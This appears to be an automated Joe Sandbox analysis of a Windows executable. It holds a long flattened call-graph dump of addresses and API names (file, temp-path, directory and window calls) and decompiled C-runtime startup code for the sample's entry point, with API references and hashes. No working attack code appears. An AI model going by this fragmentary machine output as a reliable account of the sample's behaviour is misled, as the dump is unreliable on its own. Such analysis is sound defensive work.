13631->13633 14084 401db8 13631->14084 13634 4013ff 13632->13634 13997 402634 13633->13997 13635 401d7a 30 API calls 13634->13635 13638 401408 13635->13638 13641 403a9c ctype 29 API calls 13638->13641 13644 401413 13641->13644 13642 401de3 30 API calls 13642->13633 13646 403a9c ctype 29 API calls 13644->13646 13649 40141b 13646->13649 13652 401c80 30 API calls 13649->13652 13655 40142a 13652->13655 13658 404073 30 API calls 13655->13658 13659 401443 13658->13659 13660 402634 30 API calls 13659->13660 13661 401450 13660->13661 13662 401d7a 30 API calls 13661->13662 13663 401459 13662->13663 13664 403a9c ctype 29 API calls 13663->13664 13665 401464 13664->13665 13666 403a9c ctype 29 API calls 13665->13666 13667 40146f 13666->13667 13668 403a9c ctype 29 API calls 13667->13668 13669 401477 13668->13669 13670 403a9c ctype 29 API calls 13669->13670 13671 401482 13670->13671 13672 403a9c ctype 29 API calls 13671->13672 13673 40148a 13672->13673 13674 403a9c ctype 29 API calls 13673->13674 13675 401492 13674->13675 13676 4042d6 ctype 34 API calls 13675->13676 13677 4014a6 13676->13677 13678 4042ad ctype 34 API calls 13677->13678 13678->13417 13680 414c3a 13679->13680 13681 414c3f 13679->13681 13682 4177fd ctype 7 API calls 13680->13682 13683 417836 ctype 7 API calls 13681->13683 13682->13681 13684 414c48 ExitProcess 13683->13684 16357 416cb8 13685->16357 13688 417039 13689 415523 35 API calls 13688->13689 13690 417044 13689->13690 13691 41716a UnhandledExceptionFilter 13690->13691 13692 414bfe 13690->13692 13691->13692 13707 413cc0 13693->13707 13696 4158f3 GetEnvironmentVariableA 13700 415912 13696->13700 13704 4159d0 13696->13704 13697 4158d9 13697->13696 13698 4158eb 13697->13698 13698->13279 13698->13280 13701 415957 GetModuleFileNameA 13700->13701 13703 41594f 13700->13703 13701->13703 13703->13704 13709 4179f0 13703->13709 13704->13698 13712 415883 GetModuleHandleA 13704->13712 13706 415a71 13705->13706 13706->13283 13708 413ccc GetVersionExA 13707->13708 
13708->13696 13708->13697 13714 417a07 13709->13714 13713 41589a 13712->13713 13713->13698 13716 417a1f 13714->13716 13718 417a4f 13716->13718 13723 4187a8 13716->13723 13717 4187a8 6 API calls 13717->13718 13718->13717 13720 417b78 13718->13720 13722 417a03 13718->13722 13727 41866d 13718->13727 13720->13722 13738 416eea 13720->13738 13722->13704 13724 4187ba 13723->13724 13725 4187c6 13723->13725 13724->13716 13741 418a6c 13725->13741 13728 41868b InterlockedIncrement 13727->13728 13731 418678 13727->13731 13729 4186b1 13728->13729 13730 4186a7 InterlockedDecrement 13728->13730 13753 4186dc 13729->13753 13732 41570a ctype 29 API calls 13730->13732 13731->13718 13732->13729 13735 4186d1 InterlockedDecrement 13735->13731 13736 4186c7 13759 41576b LeaveCriticalSection 13736->13759 13778 415523 GetLastError TlsGetValue 13738->13778 13740 416eef 13740->13722 13742 418a9d GetStringTypeW 13741->13742 13748 418ab5 13741->13748 13743 418ab9 GetStringTypeA 13742->13743 13742->13748 13746 418ba1 13743->13746 13743->13748 13744 418ae0 GetStringTypeA 13744->13746 13746->13724 13747 418b04 13747->13746 13749 418b1a MultiByteToWideChar 13747->13749 13748->13744 13748->13747 13749->13746 13750 418b3e ctype 13749->13750 13750->13746 13751 418b78 MultiByteToWideChar 13750->13751 13751->13746 13752 418b91 GetStringTypeW 13751->13752 13752->13746 13754 418707 13753->13754 13758 4186be 13753->13758 13755 418723 13754->13755 13756 4187a8 6 API calls 13754->13756 13755->13758 13760 41881d 13755->13760 13756->13755 13758->13735 13758->13736 13759->13731 13761 418869 13760->13761 13762 41884d LCMapStringW 13760->13762 13765 4188b2 LCMapStringA 13761->13765 13766 4188cf 13761->13766 13762->13761 13763 418871 LCMapStringA 13762->13763 13763->13761 13764 4189ab 13763->13764 13764->13758 13765->13764 13766->13764 13767 4188e5 MultiByteToWideChar 13766->13767 13767->13764 13768 41890f 13767->13768 13768->13764 13769 418945 MultiByteToWideChar 13768->13769 13769->13764 13770 41895e 
LCMapStringW 13769->13770 13770->13764 13771 418979 13770->13771 13772 41897f 13771->13772 13774 4189bf 13771->13774 13772->13764 13773 41898d LCMapStringW 13772->13773 13773->13764 13774->13764 13775 4189f7 LCMapStringW 13774->13775 13775->13764 13776 418a0f WideCharToMultiByte 13775->13776 13776->13764 13779 41553f 13778->13779 13780 41557e SetLastError 13778->13780 13789 416efc 13779->13789 13780->13740 13783 415550 TlsSetValue 13784 415576 13783->13784 13785 415561 13783->13785 13786 414c0c ctype 7 API calls 13784->13786 13788 415567 GetCurrentThreadId 13785->13788 13787 41557d 13786->13787 13787->13780 13788->13780 13797 416f31 ctype 13789->13797 13790 415548 13790->13783 13790->13784 13791 416fe9 HeapAlloc 13791->13797 13792 41570a 29 API calls ctype 13792->13797 13793 415df1 ctype 5 API calls 13793->13797 13794 416894 ctype 6 API calls 13794->13797 13797->13790 13797->13791 13797->13792 13797->13793 13797->13794 13798 416f95 13797->13798 13801 41701e 13797->13801 13804 41576b LeaveCriticalSection 13798->13804 13800 416f9c 13800->13797 13805 41576b LeaveCriticalSection 13801->13805 13803 417025 13803->13797 13804->13800 13805->13803 13806->13288 13808 41821b 13807->13808 13809 418222 13807->13809 13811 417e3a 13808->13811 13809->13335 13812 41570a ctype 29 API calls 13811->13812 13813 417e4a 13812->13813 13822 417fe7 13813->13822 13817 417fdf 13817->13809 13819 417e86 GetCPInfo 13821 417e9c 13819->13821 13820 417e61 13835 41576b LeaveCriticalSection 13820->13835 13821->13820 13827 41808d GetCPInfo 13821->13827 13823 418007 13822->13823 13824 417ff7 GetOEMCP 13822->13824 13825 417e52 13823->13825 13826 41800c GetACP 13823->13826 13824->13823 13825->13819 13825->13820 13825->13821 13826->13825 13828 418178 13827->13828 13832 4180b0 13827->13832 13828->13820 13829 418a6c 6 API calls 13830 41812c 13829->13830 13831 41881d 9 API calls 13830->13831 13833 418150 13831->13833 13832->13829 13834 41881d 9 API calls 13833->13834 13834->13828 13835->13817 13837 40102d 
13836->13837 13838 402170 13837->13838 13839 402180 13838->13839 13840 401055 13838->13840 13841 403a76 30 API calls 13839->13841 13840->13364 13842 40218a 13841->13842 13842->13840 13843 403a9c ctype 29 API calls 13842->13843 13843->13840 13845 401c9e 13844->13845 13846 402170 30 API calls 13845->13846 13847 40109a 13846->13847 13848 4038ee 13847->13848 13849 4038f8 __EH_prolog 13848->13849 13850 40396d 13849->13850 13852 401db8 30 API calls 13849->13852 13857 4010ac 13849->13857 13851 401e19 30 API calls 13850->13851 13853 40397c 13851->13853 13852->13849 13854 401d7a 30 API calls 13853->13854 13855 403989 13854->13855 13856 403a9c ctype 29 API calls 13855->13856 13856->13857 13858 403a9c 13857->13858 13859 413f9f ctype 29 API calls 13858->13859 13860 4010b4 13859->13860 13860->13376 13862 4045ec __EH_prolog 13861->13862 13863 40460b GetModuleFileNameW 13862->13863 13864 40463f 13862->13864 13866 404625 13863->13866 13871 404637 13863->13871 13865 40243e 30 API calls 13864->13865 13868 404652 13865->13868 13869 401d1b 30 API calls 13866->13869 13866->13871 13867 4010d5 13881 40235e 13867->13881 14100 404598 GetModuleFileNameA 13868->14100 13869->13871 13871->13867 13873 40468e 13876 403a9c ctype 29 API calls 13873->13876 13874 404663 AreFileApisANSI 14104 403b9c 13874->14104 13876->13871 13878 401d7a 30 API calls 13879 404686 13878->13879 13880 403a9c ctype 29 API calls 13879->13880 13880->13873 13882 402368 __EH_prolog 13881->13882 14122 4025a3 13882->14122 13884 402377 13885 403a9c ctype 29 API calls 13884->13885 13886 4010dd 13885->13886 13887 402323 13886->13887 13888 40232d __EH_prolog 13887->13888 13889 4025a3 30 API calls 13888->13889 13890 40233c 13889->13890 13891 403a9c ctype 29 API calls 13890->13891 13892 4010e5 13891->13892 13892->13384 14136 40220e 13893->14136 13896 403b4f 13897 403b58 13896->13897 13898 40110e 13897->13898 13899 403aa7 5 API calls ctype 13897->13899 13898->13390 13899->13897 13901 40116c 13900->13901 13902 40244e 13900->13902 
13906 401af4 13901->13906 13903 403a76 30 API calls 13902->13903 13904 402455 13903->13904 13904->13901 13905 403a9c ctype 29 API calls 13904->13905 13905->13901 13907 401afe __EH_prolog 13906->13907 14149 405b6d 13907->14149 13909 401b30 13909->13401 13911 401b2c ctype 13911->13909 14152 405bca 13911->14152 14156 401ee5 13911->14156 13914 40243e 30 API calls 13913->13914 13915 4014c2 13914->13915 13916 405298 13915->13916 13917 401a2d 36 API calls 13916->13917 13918 4052a0 13917->13918 14220 4051c8 13918->14220 13922 413e65 ctype 29 API calls 13921->13922 13923 403a81 13922->13923 13924 403a9a 13923->13924 14322 413d3d RaiseException 13923->14322 13924->13453 13927 408111 __EH_prolog 13926->13927 13928 4042d6 ctype 34 API calls 13927->13928 13930 408120 13928->13930 13931 401d1b 30 API calls 13930->13931 13935 401526 13930->13935 14323 4081a8 13930->14323 14326 407f06 13930->14326 14353 408248 13930->14353 14361 402092 13930->14361 13931->13930 13935->13464 13935->13465 13937 403b9c 31 API calls 13936->13937 13938 40154c 13937->13938 13938->13477 13940 402f1f __EH_prolog 13939->13940 14439 403376 13940->14439 13943 401d7a 30 API calls 13944 402f53 13943->13944 13945 401d7a 30 API calls 13944->13945 13946 402f61 13945->13946 13947 403a76 30 API calls 13946->13947 13948 402f6b 13947->13948 13950 402f7e 13948->13950 14505 4034e3 13948->14505 13951 403037 13950->13951 13952 402f9a 13950->13952 14447 403113 13951->14447 14519 413220 13952->14519 13955 402fc2 13957 402fd5 13955->13957 13958 402fc8 13955->13958 13956 403042 13959 401d7a 30 API calls 13956->13959 13961 402170 30 API calls 13957->13961 14525 4131e0 13958->14525 13962 403050 13959->13962 13964 402fe8 13961->13964 13965 403065 13962->13965 13966 401d7a 30 API calls 13962->13966 13967 40602f 33 API calls 13964->13967 14495 40348a 13965->14495 13966->13965 13969 402ff7 13967->13969 13970 401d7a 30 API calls 13969->13970 13972 403004 13970->13972 13973 403a9c ctype 29 API calls 13972->13973 13974 403010 
13973->13974 14529 40309d 13974->14529 13976 403021 13977 403a9c ctype 29 API calls 13976->13977 13978 403029 13977->13978 13979 4131e0 ctype 2 API calls 13978->13979 13980 403035 13979->13980 13980->13956 13982 405041 13981->13982 13983 405047 GetCurrentDirectoryA 13981->13983 13984 40243e 30 API calls 13982->13984 13985 405059 13983->13985 13984->13983 13985->13516 13987 402170 30 API calls 13986->13987 13988 401796 13987->13988 13989 405d0b 13988->13989 13990 40179e 13989->13990 13991 405d16 13989->13991 13990->13562 13991->13990 13992 401db8 30 API calls 13991->13992 13992->13990 13994 4017bb 13993->13994 13995 401e69 13993->13995 13994->13590 13995->13994 16172 402399 13995->16172 13998 40263e __EH_prolog 13997->13998 13999 401ce1 30 API calls 13998->13999 14000 402651 13999->14000 14001 401de3 30 API calls 14000->14001 14002 402660 14001->14002 14003 401ce1 30 API calls 14002->14003 14011 40220e 30 API calls 14010->14011 14012 401138 14011->14012 14013 401d7a 14012->14013 14014 401d98 14013->14014 14015 401d86 14013->14015 14014->13402 14016 402170 30 API calls 14015->14016 14016->14014 14017->13406 14019 403d64 __EH_prolog 14018->14019 14020 4042d6 ctype 34 API calls 14019->14020 14043 403d75 14020->14043 14021 402ee1 30 API calls 14021->14043 14023 403eec 14024 403a9c ctype 29 API calls 14023->14024 14025 403ef4 14024->14025 14026 403a9c ctype 29 API calls 14025->14026 14027 403efc 14026->14027 14028 403a9c ctype 29 API calls 14027->14028 14029 4011f5 14028->14029 14029->13433 14029->13434 14030 40243e 30 API calls 14030->14043 14031 403f09 14032 403a9c ctype 29 API calls 14031->14032 14033 403f11 14032->14033 14035 403a9c ctype 29 API calls 14033->14035 14034 40411f 30 API calls 14034->14043 14036 403f19 14035->14036 14039 403a9c ctype 29 API calls 14036->14039 14037 401ee5 30 API calls 14037->14043 14040 403f21 14039->14040 14041 403a9c ctype 29 API calls 14040->14041 14041->14029 14042 403a9c 29 API calls ctype 14042->14043 14043->14021 14043->14023 
14043->14029 14043->14030 14043->14031 14043->14034 14043->14037 14043->14042 16180 403f3c 14043->16180 16190 4040be 14043->16190 16200 40213f 14043->16200 14045->13435 14047 40408b 14046->14047 14048 4040a5 14047->14048 14049 40408f 14047->14049 14051 401ce1 30 API calls 14048->14051 14050 402170 30 API calls 14049->14050 14052 401231 14050->14052 14051->14052 14052->13452 14054 4042eb ctype 34 API calls 14053->14054 14055 401344 14054->14055 14056 4042ad 14055->14056 14057 4042b8 14056->14057 14058 4042d6 ctype 34 API calls 14057->14058 14059 4042c0 14058->14059 14060 403a9c ctype 29 API calls 14059->14060 14061 4042c8 14060->14061 14061->13455 14062->13437 14063->13437 16205 405f5e 14064->16205 14068 4021c4 30 API calls 14067->14068 14069 401df3 14068->14069 14069->13541 14070->13568 14072 401d38 14071->14072 14073 402170 30 API calls 14072->14073 14074 40173e 14073->14074 14074->13550 14076 405886 __EH_prolog 14075->14076 14077 404d51 30 API calls 14076->14077 14078 405895 14077->14078 14079 405806 32 API calls 14078->14079 14080 4058a2 14079->14080 14081 403a9c ctype 29 API calls 14080->14081 14082 401753 14081->14082 14082->13578 14083->13600 14085 4021c4 30 API calls 14084->14085 14086 401805 14085->14086 14086->13642 14096 401a35 14095->14096 14097 401a39 14095->14097 14096->13532 16267 404c4a 14097->16267 14101 4045c7 14100->14101 14102 4045d9 14100->14102 14101->14102 14117 4046ab 14101->14117 14102->13873 14102->13874 14105 403ba6 __EH_prolog 14104->14105 14106 402170 30 API calls 14105->14106 14107 403bc9 14106->14107 14108 403c10 14107->14108 14109 403be1 MultiByteToWideChar 14107->14109 14111 402170 30 API calls 14107->14111 14110 401ce1 30 API calls 14108->14110 14109->14108 14112 403bfb 14109->14112 14113 403c26 14110->14113 14111->14109 14121 413d3d RaiseException 14112->14121 14115 403a9c ctype 29 API calls 14113->14115 14116 403c2e 14115->14116 14116->13878 14118 4046c1 14117->14118 14118->14118 14119 40243e 30 API calls 14118->14119 14120 4046d0 
14119->14120 14120->14102 14121->14108 14123 4025ad __EH_prolog 14122->14123 14124 402170 30 API calls 14123->14124 14125 4025c9 14124->14125 14126 401db8 30 API calls 14125->14126 14127 4025d6 14126->14127 14128 401db8 30 API calls 14127->14128 14129 4025e0 14128->14129 14130 401db8 30 API calls 14129->14130 14131 4025ea 14130->14131 14132 401ce1 30 API calls 14131->14132 14133 4025f6 14132->14133 14134 403a9c ctype 29 API calls 14133->14134 14135 4025fe 14134->14135 14135->13884 14138 402218 __EH_prolog 14136->14138 14137 40224c 14140 402170 30 API calls 14137->14140 14138->14137 14139 402241 14138->14139 14141 401ce1 30 API calls 14139->14141 14142 40225f 14140->14142 14148 401105 14141->14148 14143 402170 30 API calls 14142->14143 14144 40226c 14143->14144 14145 401ce1 30 API calls 14144->14145 14146 4022a0 14145->14146 14147 403a9c ctype 29 API calls 14146->14147 14147->14148 14148->13896 14159 405b4c 14149->14159 14154 405bd7 14152->14154 14155 405c03 14154->14155 14211 405ba8 14154->14211 14155->13911 14216 40248c 14156->14216 14162 405b2f 14159->14162 14165 4059b3 14162->14165 14166 4059bd __EH_prolog 14165->14166 14167 405a25 14166->14167 14168 4059ce 14166->14168 14183 405a63 14167->14183 14169 401c80 30 API calls 14168->14169 14171 4059d9 AreFileApisANSI 14169->14171 14186 403d04 14171->14186 14174 405a30 CreateFileW 14175 405a53 14174->14175 14175->13911 14179 403a9c ctype 29 API calls 14180 405a17 14179->14180 14181 403a9c ctype 29 API calls 14180->14181 14182 405a1f 14181->14182 14182->14175 14184 405a6d FindCloseChangeNotification 14183->14184 14185 405a2c 14183->14185 14184->14185 14185->14174 14185->14175 14194 403c43 14186->14194 14189 40597a 14190 405a63 FindCloseChangeNotification 14189->14190 14191 405985 14190->14191 14192 405989 CreateFileA 14191->14192 14193 4059ae 14191->14193 14192->14193 14193->14179 14195 403c4d __EH_prolog 14194->14195 14196 40243e 30 API calls 14195->14196 14197 403c6f 14196->14197 14198 403cd3 14197->14198 14199 
403c90 WideCharToMultiByte 14197->14199 14201 40243e 30 API calls 14197->14201 14208 403d24 14198->14208 14199->14198 14202 403cbe 14199->14202 14201->14199 14207 413d3d RaiseException 14202->14207 14204 403a9c ctype 29 API calls 14206 403cf0 14204->14206 14206->14189 14207->14198 14209 40243e 30 API calls 14208->14209 14210 403ce8 14209->14210 14210->14204 14212 405bb5 14211->14212 14215 405b7b ReadFile 14212->14215 14214 405bc6 14214->14154 14215->14214 14217 401eef 14216->14217 14218 4024a0 14216->14218 14217->13911 14219 40243e 30 API calls 14218->14219 14219->14217 14221 4051d2 __EH_prolog 14220->14221 14236 405268 14221->14236 14224 405243 14262 4051a4 14224->14262 14225 4051a4 SetFileAttributesA DeleteFileA 14227 4051e3 14225->14227 14227->14224 14227->14225 14230 4014d3 14227->14230 14231 403a9c ctype 29 API calls 14227->14231 14234 405268 30 API calls 14227->14234 14235 40522c GetLastError 14227->14235 14239 40511b 14227->14239 14253 4058cd 14227->14253 14261 40498d CreateDirectoryA 14227->14261 14228 40524b 14229 403a9c ctype 29 API calls 14228->14229 14229->14230 14230->13431 14230->13432 14231->14227 14234->14227 14235->14227 14235->14230 14237 40243e 30 API calls 14236->14237 14238 405281 14237->14238 14238->14227 14240 405125 __EH_prolog 14239->14240 14241 40243e 30 API calls 14240->14241 14242 405141 14241->14242 14267 40506f 14242->14267 14244 40514c 14252 405164 14244->14252 14272 4050e5 14244->14272 14245 403a9c ctype 29 API calls 14247 405191 14245->14247 14247->14227 14250 405170 14251 4050e5 33 API calls 14250->14251 14250->14252 14251->14252 14252->14245 14254 4058d7 __EH_prolog 14253->14254 14293 404d51 14254->14293 14259 403a9c ctype 29 API calls 14260 4058fd 14259->14260 14260->14227 14261->14227 14263 4051b0 14262->14263 14264 4051ac 14262->14264 14316 404bdc 14263->14316 14264->14228 14266 4051b8 14266->14228 14268 405083 GetTempPathA 14267->14268 14269 40507d 14267->14269 14271 405095 14268->14271 14270 40243e 30 API calls 14269->14270 
14270->14268 14271->14244 14273 4051a4 2 API calls 14272->14273 14274 4050ee 14273->14274 14284 4050ab 14274->14284 14276 4050ff 14277 405111 14276->14277 14289 4052f9 14276->14289 14277->14252 14279 4047db 14277->14279 14280 4047e9 14279->14280 14281 4047ef GetWindowsDirectoryA 14279->14281 14282 40243e 30 API calls 14280->14282 14283 404802 14281->14283 14282->14281 14283->14250 14285 4050c0 14284->14285 14286 4050c8 GetTempFileNameA 14284->14286 14287 40243e 30 API calls 14285->14287 14288 4050dd 14286->14288 14287->14286 14288->14276 14290 405305 14289->14290 14292 405316 14289->14292 14291 40243e 30 API calls 14290->14291 14291->14292 14292->14277 14294 40243e 30 API calls 14293->14294 14295 404d68 14294->14295 14296 405806 14295->14296 14297 405810 __EH_prolog 14296->14297 14302 40553a 14297->14302 14303 40551a FindClose 14302->14303 14304 40554b 14303->14304 14305 405566 14304->14305 14306 40554f FindFirstFileA 14304->14306 14309 40551a 14305->14309 14306->14305 14307 40556a 14306->14307 14312 40557f 14307->14312 14310 405524 FindClose 14309->14310 14311 40552f 14309->14311 14310->14311 14311->14259 14313 4055bd 14312->14313 14314 4046ab 30 API calls 14313->14314 14315 4055da 14314->14315 14315->14305 14321 40489c SetFileAttributesA 14316->14321 14318 404be6 14319 404bea 14318->14319 14320 404bec DeleteFileA 14318->14320 14319->14266 14320->14266 14321->14318 14322->13924 14324 402170 30 API calls 14323->14324 14325 4081c8 14324->14325 14325->13930 14327 407f10 __EH_prolog 14326->14327 14328 401c80 30 API calls 14327->14328 14341 407f67 14327->14341 14331 407f4c 14328->14331 14329 401c80 30 API calls 14333 407f78 14329->14333 14330 408018 14332 4042d6 ctype 34 API calls 14330->14332 14369 408062 14331->14369 14335 408027 14332->14335 14336 408062 35 API calls 14333->14336 14339 4042ad ctype 34 API calls 14335->14339 14340 407f87 14336->14340 14338 403a9c ctype 29 API calls 14338->14341 14342 408033 14339->14342 14343 403a9c ctype 29 API calls 14340->14343 
14341->14329 14351 407f93 14341->14351 14345 4042d6 ctype 34 API calls 14342->14345 14343->14351 14344 402ee1 30 API calls 14344->14351 14347 408045 14345->14347 14346 401d7a 30 API calls 14346->14351 14348 4042ad ctype 34 API calls 14347->14348 14349 408051 14348->14349 14349->13930 14351->14330 14351->14344 14351->14346 14352 403a9c 29 API calls ctype 14351->14352 14382 4081e7 14351->14382 14352->14351 14354 408252 __EH_prolog 14353->14354 14355 403a76 30 API calls 14354->14355 14356 40825d 14355->14356 14357 408274 14356->14357 14422 40828f 14356->14422 14359 4039df 30 API calls 14357->14359 14360 408280 14359->14360 14360->13930 14362 40209c __EH_prolog 14361->14362 14363 4042d6 ctype 34 API calls 14362->14363 14364 4020c0 14363->14364 14365 4042ad ctype 34 API calls 14364->14365 14366 4020cb 14365->14366 14367 403a9c ctype 29 API calls 14366->14367 14368 4020d3 14367->14368 14368->13930 14370 40806c __EH_prolog 14369->14370 14371 4042d6 ctype 34 API calls 14370->14371 14372 40807e 14371->14372 14373 402170 30 API calls 14372->14373 14374 408093 14373->14374 14375 4080ef 14374->14375 14377 4080de 14374->14377 14379 401db8 30 API calls 14374->14379 14392 403998 14374->14392 14376 403a9c ctype 29 API calls 14375->14376 14378 407f5b 14376->14378 14377->14375 14380 403998 30 API calls 14377->14380 14378->14338 14379->14374 14380->14375 14383 4081f1 __EH_prolog 14382->14383 14384 403a76 30 API calls 14383->14384 14385 4081fd 14384->14385 14386 408227 14385->14386 14387 401ce1 30 API calls 14385->14387 14389 4039df 30 API calls 14386->14389 14388 408217 14387->14388 14390 401ce1 30 API calls 14388->14390 14391 408238 14389->14391 14390->14386 14391->14351 14393 4039a2 __EH_prolog 14392->14393 14394 403a76 30 API calls 14393->14394 14395 4039ad 14394->14395 14396 4039c4 14395->14396 14397 401ce1 30 API calls 14395->14397 14400 4039df 14396->14400 14397->14396 14399 4039d0 14399->14374 14403 4042ff 14400->14403 14404 4039e7 14403->14404 14405 404307 14403->14405 
14404->14399 14407 404327 14405->14407 14408 4043cb 14407->14408 14409 40433b 14407->14409 14408->14404 14410 404358 14409->14410 14419 413d3d RaiseException 14409->14419 14412 40437f 14410->14412 14420 413d3d RaiseException 14410->14420 14415 403a76 30 API calls 14412->14415 14417 4043a7 14412->14417 14414 403a9c ctype 29 API calls 14414->14408 14416 40438b 14415->14416 14416->14417 14421 413d3d RaiseException 14416->14421 14417->14414 14419->14410 14420->14412 14421->14417 14423 408299 __EH_prolog 14422->14423 14424 401ce1 30 API calls 14423->14424 14425 4082c0 14424->14425 14428 4082e8 14425->14428 14429 4082f2 __EH_prolog 14428->14429 14430 4042d6 ctype 34 API calls 14429->14430 14431 408319 14430->14431 14434 408334 14431->14434 14435 404327 30 API calls 14434->14435 14438 40834c 14435->14438 14436 4082d0 14436->14357 14437 4081e7 30 API calls 14437->14438 14438->14436 14438->14437 14440 403380 __EH_prolog 14439->14440 14441 402170 30 API calls 14440->14441 14442 40339c 14441->14442 14443 402170 30 API calls 14442->14443 14444 4033b1 14443->14444 14445 402170 30 API calls 14444->14445 14446 402f3e 14445->14446 14446->13943 14448 40311d __EH_prolog 14447->14448 14543 402ee1 14448->14543 14453 403141 14454 401d1b 30 API calls 14453->14454 14455 40314f 14454->14455 14457 403a9c ctype 29 API calls 14455->14457 14456 403158 14552 408f0a 14456->14552 14490 4031c1 14457->14490 14459 403198 14460 4042ad ctype 34 API calls 14459->14460 14461 4031a6 14460->14461 14462 4031c6 14461->14462 14463 4031ab 14461->14463 14464 401ce1 30 API calls 14462->14464 14465 401d1b 30 API calls 14463->14465 14466 4031d2 14464->14466 14465->14455 14467 405d0b 30 API calls 14466->14467 14468 4031de 14467->14468 14612 4049dd 14468->14612 14471 40322a 14473 401c80 30 API calls 14471->14473 14472 4031ea 14739 409569 14472->14739 14475 403237 14473->14475 14647 402685 14475->14647 14481 403a9c ctype 29 API calls 14483 403269 14481->14483 14654 40c231 14483->14654 14690 40bbc9 14483->14690 
14487 403284 14489 403a9c ctype 29 API calls 14487->14489 14490->13956 14496 403494 __EH_prolog 14495->14496 14497 403a9c ctype 29 API calls 14496->14497 14498 4034aa 14497->14498 16081 40341c 14498->16081 14501 403a9c ctype 29 API calls 14502 4034cc 14501->14502 14503 403a9c ctype 29 API calls 14502->14503 14504 401581 14503->14504 14504->13490 14504->13491 14506 4034ed __EH_prolog 14505->14506 14507 402170 30 API calls 14506->14507 14508 40351f 14507->14508 14509 402170 30 API calls 14508->14509 14510 403535 14509->14510 14511 402170 30 API calls 14510->14511 14512 40354b 14511->14512 14513 402170 30 API calls 14512->14513 14514 403564 14513->14514 16091 4035a6 14514->16091 14517 402170 30 API calls 14518 403589 14517->14518 14518->13950 16110 4148be 14519->16110 14522 413243 14522->13955 14523 413248 GetLastError 14524 413252 14523->14524 14524->13955 14526 4131e9 CloseHandle 14525->14526 14528 402fd0 14525->14528 14527 4131f4 GetLastError 14526->14527 14526->14528 14527->14528 14528->13965 14530 4030a7 __EH_prolog 14529->14530 14531 401d7a 30 API calls 14530->14531 14532 4030bc 14531->14532 16140 40620b 14532->16140 14536 4030d4 14537 40602f 33 API calls 14536->14537 14538 4030df 14537->14538 16160 406049 14538->16160 14541 403a9c ctype 29 API calls 14542 4030f5 ShowWindow 14541->14542 14542->13976 14544 402170 30 API calls 14543->14544 14545 402ef5 14544->14545 14546 405841 14545->14546 14547 40584b __EH_prolog 14546->14547 14747 4055de 14547->14747 14550 40551a FindClose 14551 40313d 14550->14551 14551->14453 14551->14456 14553 408f14 __EH_prolog 14552->14553 14554 403a76 30 API calls 14553->14554 14555 408f31 14554->14555 14556 408f43 14555->14556 14869 409184 14555->14869 14558 402170 30 API calls 14556->14558 14559 408f7a 14558->14559 14560 402170 30 API calls 14559->14560 14561 408f91 14560->14561 14562 402170 30 API calls 14561->14562 14563 408fa8 14562->14563 14564 40906f 14563->14564 14788 404e76 14563->14788 14843 408a3b 14564->14843 14568 408fd3 

                                          Control-flow Graph

                                          C-Code - Quality: 83%
                                          			_entry_(void* __ebx, void* __edi, void* __esi) {
                                          				CHAR* _v8;
                                          				intOrPtr* _v24;
                                          				intOrPtr _v28;
                                          				struct _STARTUPINFOA _v96;
                                          				intOrPtr _v100;
                                          				intOrPtr _v104;
                                          				intOrPtr _v108;
                                          				unsigned int _t15;
                                          				signed int _t27;
                                          				intOrPtr _t29;
                                          				signed int _t35;
                                          				intOrPtr _t52;
                                          
                                          				_t47 = __edi;
                                          				_push(0xffffffff);
                                          				_push(0x41b9e0);
                                          				_push(E00414A2C);
                                          				_push( *[fs:0x0]);
                                          				 *[fs:0x0] = _t52;
                                          				_push(__edi);
                                          				_v28 = _t52 - 0x58;
                                          				_t15 = GetVersion();
                                          				 *0x4233d0 = 0;
                                          				_t35 = _t15 & 0x000000ff;
                                          				 *0x4233cc = _t35;
                                          				 *0x4233c8 = _t35 << 8;
                                          				 *0x4233c4 = _t15 >> 0x10;
                                          				if(E004159F8(_t35 << 8, 1) == 0) {
                                          					E00414C31(0x1c);
                                          				}
                                          				if(E004154BC() == 0) {
                                          					E00414C31(0x10);
                                          				}
                                          				_v8 = 0;
                                          				E00417641();
                                          				 *0x425a3c = GetCommandLineA();
                                          				 *0x423340 = E0041750F();
                                          				E004172C2();
                                          				E00417209();
                                          				E00416C69();
                                          				_v96.dwFlags = 0;
                                          				GetStartupInfoA( &_v96);
                                          				_v104 = E004171B1();
                                          				_t56 = _v96.dwFlags & 0x00000001;
                                          				if((_v96.dwFlags & 0x00000001) == 0) {
                                          					_t27 = 0xa;
                                          				} else {
                                          					_t27 = _v96.wShowWindow & 0x0000ffff;
                                          				}
                                          				_t29 = E00401014(_t56, GetModuleHandleA(0), 0, _v104, _t27); // executed
                                          				_v100 = _t29;
                                          				E00416C96(_t29);
                                          				_v108 =  *((intOrPtr*)( *_v24));
                                          				return E00417039(_t47, _t56,  *((intOrPtr*)( *_v24)), _v24);
                                          			}
















                                          APIs
                                          • GetVersion.KERNEL32 ref: 00414B2A
                                            • Part of subcall function 004159F8: HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                            • Part of subcall function 004159F8: HeapDestroy.KERNEL32 ref: 00415A48
                                          • GetCommandLineA.KERNEL32 ref: 00414B8A
                                          • GetStartupInfoA.KERNEL32(?), ref: 00414BB5
                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00414BD8
                                            • Part of subcall function 00414C31: ExitProcess.KERNEL32 ref: 00414C4E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                          • String ID:
                                          • API String ID: 2057626494-0
                                          • Opcode ID: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
                                          • Instruction ID: b13fe99396feb2249fb7197ea22bdd2eb3a8d4431b5d50e9622b99800ed9eeb5
                                          • Opcode Fuzzy Hash: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
